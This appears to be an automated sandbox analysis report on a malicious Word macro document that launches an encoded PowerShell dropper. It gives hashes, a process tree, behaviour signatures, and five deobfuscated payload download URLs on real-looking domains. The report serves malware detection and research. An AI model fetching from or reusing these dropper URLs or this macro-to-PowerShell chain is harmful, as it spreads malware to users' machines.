Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    27/05/2024, 19:07

General

  • Target

    7a327006a49fa731461955d500e312dc_JaffaCakes118.doc

  • Size

    244KB

  • MD5

    7a327006a49fa731461955d500e312dc

  • SHA1

    331daffed89c0391683f12c91bdd35d4a4a45106

  • SHA256

    788d5bb87879fca4fec80a7ab909d74baf2cb634036860e37ebdaa7f44b49674

  • SHA512

    8779b99fa388dd9ddb8c975cac29a7fe8a10829ea0a92c5ec5142f5e8216c53393970a6594d20cec570b46ecf6a9eab980d06b82bbb920508b7f494a52d31f22

  • SSDEEP

    3072:iKmtgp237irS5/01rO9rN4iG/8jL/xSu90OoiLuDKZXfwKeljR1A:iKSo237ir4/2O9rN4d/KxUOmD+XfwL0

Score
10/10

Malware Config

  • Extracted
    Language: ps1
    Deobfuscated
    URLs (exe.dropper):
      http://iventurecard.co.uk/mqGwkGN
      http://yduocvinhphuc.info/kblPYSdiX
      http://zinimedia.dk/wCJyaYfn2
      http://nightonline.ru/images/WF0wknLoVI
      http://www.acs.vn/0SCQbnzLv

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7a327006a49fa731461955d500e312dc_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e 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
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:300
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2912

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

            Filesize

            68KB

            MD5

            29f65ba8e88c063813cc50a4ea544e93

            SHA1

            05a7040d5c127e68c25d81cc51271ffb8bef3568

            SHA256

            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

            SHA512

            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          • C:\Users\Admin\AppData\Local\Temp\Tar69F1.tmp

            Filesize

            177KB

            MD5

            435a9ac180383f9fa094131b173a2f7b

            SHA1

            76944ea657a9db94f9a4bef38f88c46ed4166983

            SHA256

            67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

            SHA512

            1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            3be6b516571848167f37dc3491203817

            SHA1

            0329c853ca6e763776911bf5967894cf9ed6c57d

            SHA256

            58cc830812e64c73e475b482d2662d4150986dc3764a0870b19ace4cb6f6e33f

            SHA512

            5e0a711b172249026ab8825d4bd67d20cd6443945054fb859e4d6bb15411dabaf059f61f2ca0d84feac98f4fc0e5315a81832f07acd9817ec9b473e05184ff21

          • memory/2108-84-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-134-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB

          • memory/2108-83-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-61-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-82-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-0-0x000000002F6D1000-0x000000002F6D2000-memory.dmp

            Filesize

            4KB

          • memory/2108-125-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-41-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-135-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-137-0x0000000006870000-0x0000000006970000-memory.dmp

            Filesize

            1024KB

          • memory/2108-138-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-19-0x00000000051B0000-0x00000000052B0000-memory.dmp

            Filesize

            1024KB

          • memory/2108-2-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB

          • memory/2108-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2108-204-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2108-205-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB